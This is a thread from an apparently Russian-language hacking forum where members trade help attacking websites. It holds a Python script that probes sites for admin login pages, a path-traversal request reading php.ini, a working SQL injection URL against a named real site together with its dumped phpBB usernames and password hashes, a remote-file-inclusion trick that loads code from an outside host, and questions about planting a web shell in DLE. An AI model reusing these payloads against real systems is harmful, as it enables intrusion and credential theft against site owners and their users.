Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 -m0rgan-

    спасибо . А что за брут по админке ?
     
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Code:
    #/usr/bin/python
    import sys, os, time, httplib
    if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
    else:
    clearing = 'cls'
    os.system(clearing)
    if len(sys.argv) != 2:
    print "\n|-------------------------------------------------------------|"
    print "|               Admin login finder     v2.0                     |"
    print "| Help: admin-find.py -h                                        |"
    print "|---------------------------------------------------------------|\n"
    sys.exit(1)
    for arg in sys.argv:
    if arg == '-h':
    print "\n|-----------------------------------------------------------------------------|"
    print "|                Admin login finder     v2.0                                    |"
    print "| Usage: admin-find.py www.site.com                                             |"
    print "| Example: admin-find.py site.com                                               |"
    print "|-------------------------------------------------------------------------------|\n"
    sys.exit(1)
    site = sys.argv[1].replace("http://","").rsplit("/",1)[0] 
    site = site.lower()
    admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
    'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','w    ebadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',    
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.htm    l','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','m    odelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpane    l.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php',    'admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php    ','memberadmin.php','administratorlogin.php']
    print "\n|-------------------------------------------------------------|"
    print "|                Admin login finder     v2.0                    |"
    print "|---------------------------------------------------------------|\n"
    print "\n[-] %s" % time.strftime("%X")
    		print "[+] Target:",site
    print "[+] Checking paths..."
    print
    try:
    for admin in admin_path:
    admin = admin.replace("\n","")
    admin = "/" + admin
    connection = httplib.HTTPConnection(site)
    connection.request("GET",admin)
    response = connection.getresponse()
    print "%s %s %s" % (admin, response.status, response.reason)
    except(KeyboardInterrupt,SystemExit):
    raise
    except:
    pass
    
     
  3. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    ошибка в самом php.ini чтоли ?
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Эм...а куда ты его подключаешь?
    дай код!
     
    #6344 -m0rgan-, 4 Apr 2009
    Last edited: 4 Apr 2009
  5. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    в принципе я делаю только вот такой запрос

    http://www.sitename.com/scriptname.php?param=../../../../../../../../../../../usr/local/lib/php.ini%00
     
  6. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    http://so-znanie.com/backend/main.php
     
    1 person likes this.
  7. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    забыл каким образом можно выводит все содержание папки , а не пользуясь LIMIT 1,1 .....
     
  8. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    2 Saiga
    Можно воспользуватся функцией group_concat()
    Code:
    http://www.so-znanie.com/index.php?id=-8+union+all+select+1,2,group_concat(concat_ws(0x3a3a,username,user_password))+from+phpbb_users--
    
    Code:
    Anonymous::,admin::$H$9E9TzrtDlqUnPvFMYhqJaISbU/UKV21,AdsBot [Google]::,Alexa [Bot]::,Alta Vista [Bot]::,Ask Jeeves [Bot]::,Baidu [Spider]::,Exabot [Bot]::,FAST Enterprise [Crawler]::,FAST WebCrawler [Crawler]::,Francis [Bot]::,Gigabot [Bot]::,Google Adsense [Bot]::,Google Desktop::,Google Feedfetcher::,Google [Bot]::,Heise IT-Markt [Crawler]::,Heritrix [Crawler]::,IBM Research [Bot]::,ICCrawler - ICjobs::,ichiro [Crawler]::,Majestic-12 [Bot]::,Metager [Bot]::,MSN NewsBlogs::,MSN [Bot]::,MSNbot Media::,NG-Search [Bot]::,Nutch [Bot]::,Nutch/CVS [Bot]::,OmniExplorer [Bot]::,Online link [Validator]::,psbot [Picsearch]::,Seekport [Bot]::,Sensis [Crawler]::,SEO Crawler::,Seoma [Crawler]::,SEOSearch [Crawler]::,Snappy [Bot]::,Steeler [Crawler]::,Synoo [Bot]::,Telekom [Bot]::,TurnitinBot [Bot]::,Voyager [Bot]::,W3 [Sitesearch]::,W3C [Linkcheck]::,W3C [Validator]::,WiseNut [Bot]::,YaCy [Bot]::,Yahoo MMCrawler [Bot]::,Yahoo Slurp [Bot]::,Yahoo [Bot]::,YahooSeeker [Bot]::,Виталий::$H$9hSsjxJ2UF5iUD8kzntbWpyPoXfE
    
    Там ботов больше чем людей =))
     
    #6348 -m0rgan-, 4 Apr 2009
    Last edited: 4 Apr 2009
  9. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    group_concat() всех не выведеш
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Дорогие отвечающие на вопросы!!!

    Я уже несколько раз говорил, что если уж вы отвечаете на вопросы не надо писать ОХИНЕЮ и разводить флуд и оффтоп на 15 страниц.

    Человек искал админку ат сайта, имея пасс от него. Вот пост НОРМАЛЬНОГО ответа по теме:
    ВСЁ !!!!
    Нахрена ему говорить, что пароль не правильный, когда админка даже не найдена? Нахрена ему ваша скуль? У него есть аккаунт, может он его и достал через скуль, он НЕ ПРОСИЛ искать баги, он просил админку. Нахрена ему форум, нахрена ему расшифровывать хеши от него?

    И весь этот ОФФТОП на несколько страниц, а результата нет и не предвидится.

    И так по каждому вопросу. На будующее, такую бессмысленную активность буду расценивать как флуд и набивание постов и реагировать на неё согласно правилам форума.

    Сюда-же попадает ОХИНЕЯ, которую некоторые несут с завидной регулярностью.
    Если вы не уверены в ответе, отвечать НЕ НУЖНО.
    Если человек просит подсказать есть ли скуль, НЕ НАДО писать, что там расскрытие пути, сдесь нет слепых юзеров. Не надо сюда копипастить милворм, в лучшем случае ссылку на сплоит. Не надо показавать свою некомпетентность, я вам со всей ответственностью могу заявить, что такого рода активность не пойдёт вам в зачёт, она напротив только показывает отсутствие знаний.

    Надеюсь , что все меня поняли правильно, утопить топик во флуде я не дам, весь оффтоп буду жестко пресекать

    Спасибо за внимание
     
    8 people like this.
  11. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    челы резко встал вопрос залития шелла в dle
    1. изменил тип файлов, залил через новость.. но я незнаю названия файла..
    2. через шаблон пхп не исполняется..
    подскажи еще способы.. очень прошу - нужно!
     
  12. joks

    joks Member

    Joined:
    27 Sep 2008
    Messages:
    16
    Likes Received:
    14
    Reputations:
    0
    народ, помогите.

    есть сайт www.sait.ru

    скрипт www.sait.ru/text.php имхо бажный. методом GET передаются два параметра p & n

    генерация страницы просиходит примерно следующим образом

    $path = substr($_GET['p'],0,8)."/".substr($_GET['n'],0,8).'.htm';
    ///
    $x = fopen($path, 'w');
    ///
    require($path);

    если в корне лежит title.htm, то при www.sait.ru/text.php?p=news&n=../title
    выведет ее.
    одна проблема: оба параметра обрезаются до 8 символов... Как это можно обойти?? в корне также лежит .passwd Никак не могу его вывести, т.к. он считает и %00, и название файла получается больше 8 символов, это бесит.. я не знаю как убрать слеш, чтоб ввести название двумя параметрами... Также не могу исполнить там свой скрипт с другого хоста.. пробовал www.sait.ru/text.php?p=http:/&n=moysait.ru/code.php%00
    но никак не укладываюсь в 8 символов.

    заранее спасибо
     
    3 people like this.
  13. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    никак.
     
  14. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    joks, у тебя ведь 2 параметра? если так, то

    пусть p = http:/
    n = abc.ru/a

    тогда path = http://abc.ru/a.htm

    осталось найти трехбуквенник ру
     
  15. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    .:[melkiy]:. нет, либо утилитами,очень редко на сайте где уязвимость выводятся вся инфа без использования лимита
     
    1 person likes this.
  17. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 Gorev

    А какже group_concat()

    я только этим и пользуюсь
     
  18. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    group_concat выводит, правда не все, а насколько хватит места в поле
     
  19. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    group_concat() НЕ вывод всё....он огранич значением в group_concat_max_len.Так же он вроде бы не поддерживает лимит.
     
    1 person likes this.
  20. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Если после ввода такой конструкции site.ru/index.asp?id=2'

    Вылезла ошибка :
    PHP:
    Microsoft OLE DB Provider for SQL Server ошибка '80040e14' 

    Unclosed quotation mark before the character string ''.
    Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...
     
Thread Status:
Not open for further replies.